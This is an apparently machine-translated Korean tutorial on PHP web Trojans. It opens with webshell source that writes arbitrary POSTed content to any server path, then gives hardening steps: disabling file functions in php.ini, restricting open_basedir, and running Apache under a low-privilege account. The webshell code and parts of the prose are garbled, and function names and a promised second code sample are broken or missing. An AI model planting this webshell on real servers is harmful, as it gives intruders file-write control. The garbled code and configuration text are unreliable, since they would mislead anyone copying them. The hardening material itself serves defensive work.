php web Trojan 코드 복사 코드는 다음과 같습니다. header("content- 유형: text /html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = Stripslashes($v); ?> 저장 파일 이름: 텍스트 영역> ;?php if(isset($_POST['file'])) { $fp = @fopen($_POST['file'],'wb') echo @ fwrite($ fp,$_POST['text']) ? '저장 성공!' : @fclose($fp) ?> 🎜>한 문장 php Trojan코드 복사 코드는 다음과 같습니다. PHP 트로이 목마를 방지하는 방법PHP는 동적 웹 페이지를 생성할 수 있는 도구 중 하나입니다. PHP 웹 파일은 일반 HTML 웹 파일로 취급되며 편집 시 HTML 편집과 동일한 방식으로 PHP를 작성할 수 있습니다. PHP는 Hypertext Preprocessor(PHP: Hypertext Preprocessor)를 의미하며 PHP 공식 사이트(http://www.php.net)에서 무료로 다운로드할 수 있습니다. PHP는 Linux 및 Emacs와 같은 많은 인기 소프트웨어가 탄생한 GNU Public License(GPL)를 준수합니다. PHP는 대부분의 Unix 플랫폼, GUN/Linux 및 Microsoft Windows 플랫폼에서 실행될 수 있습니다. Windows PC 또는 Unix 시스템에 PHP를 설치하는 방법에 대한 정보는 PHP 공식 사이트에서 찾을 수 있습니다. 설치 과정은 간단합니다. PHP의 또 다른 이점은 보안입니다. 인터넷이 발전하면서 네트워크 보안이 점점 더 주목을 받고 있습니다. PHP는 ASP처럼 보안 설정이 매우 간단하기 때문에 ASP를 거의 대체했습니다. 많은 단계를 거치고 많은 서비스가 비활성화됩니다. 그러나 아무리 좋은 것이더라도 항상 단점이 있습니다. PHP가 기본적으로 구성되어 있으면 취약할 것입니다. 따라서 이 기사에서는 스크립트 트로이 목마의 파괴를 방지하기 위해 PHP의 일부 보안 측면을 구성하는 방법에 대해 설명합니다. 1. php Trojan이 웹셸을 실행하지 못하도록 방지 safe_mode를 열고 php.ini에서 비활성화_functi를 설정하거나 둘 중 하나를 선택할 수 있습니다. 2. 웹 디렉터리 밖으로 점프 방지 먼저 httpd.conf를 수정하세요. php 스크립트 프로그램이 웹 디렉터리에서만 작동하도록 허용한다면, httpd.conf 파일을 수정하여 작업 경로를 제한할 수도 있습니다. PHP의. 예를 들어, 웹 디렉토리가 /usr/local/apache/htdocs인 경우 스크립트가 /usr/local/apache/를 읽으려는 경우 httpd.conf에 다음 행을 추가하십시오: php_admin_value open_basedir /usr/local/apache/htdocs htdocs 이외의 파일은 열 때 오류 메시지가 표시되면 다음과 같은 오류가 표시됩니다: 경고: open_basedir 제한이 적용되었습니다. 파일이 /usr/local/apache/htdocs/open의 잘못된 디렉터리에 있습니다. 4번째 줄의 .php 등. 3. PHP 트로이 목마가 파일 디렉터리를 읽고 쓰는 것을 방지 php.ini에서 비활성화_functi 뒤에 PHP 파일 처리 기능을 추가합니다. 주로 fopen, mkdir, rmdir, chmod, unlink, dir, fopen, fread, fclose, fwrite, file_exists, closeir, is_dir, readdir.opendir, fileperms.copy, unlink, delfile. 이는 비활성화_functi, fopen, mkdir, rmdir, chmod, unlink, dir, fopen, fread, fclose, fwrite, file_exists, closeir, is_dir, readdir.opendir, fileperms.copy, unlink, delfile입니다. 끝났습니다. PHP 트로이 목마는 우리를 이길 수 없습니다. 불행하게도 이 경우 텍스트 데이터베이스를 사용하는 작업은 더 이상 작동하지 않습니다. Apache가 Windos 플랫폼에 구축된 경우 주의가 필요합니다. 기본적으로 Apache는 시스템 권한으로 실행됩니다. net user apache f**kmicrosoft /add net localgroup users apache / del 이때 어떤 그룹에도 속하지 않는 사용자 apche가 생성되었습니다. 컴퓨터 관리자-서비스-아파치 서비스 속성-로그인-이 계정을 열고 다음을 입력하세요. 위에서 생성한 계정과 비밀번호를 입력하고 아파치를 다시 시작하면 서비스가 낮은 권한으로 실행되는 아파치를 실현할 수 있습니다. 요약: 실제로 각 폴더의 권한을 설정하고 각 디렉터리에 대해 읽고 쓸 수 있는 별도의 사용자를 생성하는 방식으로도 보안을 달성할 수 있습니다. 현재 많은 가상 호스팅 제공업체에서 널리 사용되는 구성 방법이지만 이를 방지하기에는 이 방법이 과도합니다. 관리자가 보안의식을 갖고 있는 한, 사용되지 않는 기능을 상대적으로 차단함으로써 네트워크 보안 위협을 예방할 수 있습니다. 다음은 일부 웹 트로이 목마의 파일 생성 등을 방지하기 위한 mcafee의 보안 설정입니다. http://www.jb51.net/hack/list461_1.html 위에는 세상에서 가장 작은 PHP 웹 트로이목마를 소개하고, PHP 트로이목마의 예방법과 관련 내용을 포함하여 PHP 튜토리얼에 관심이 있는 친구들에게 도움이 되었으면 좋겠습니다.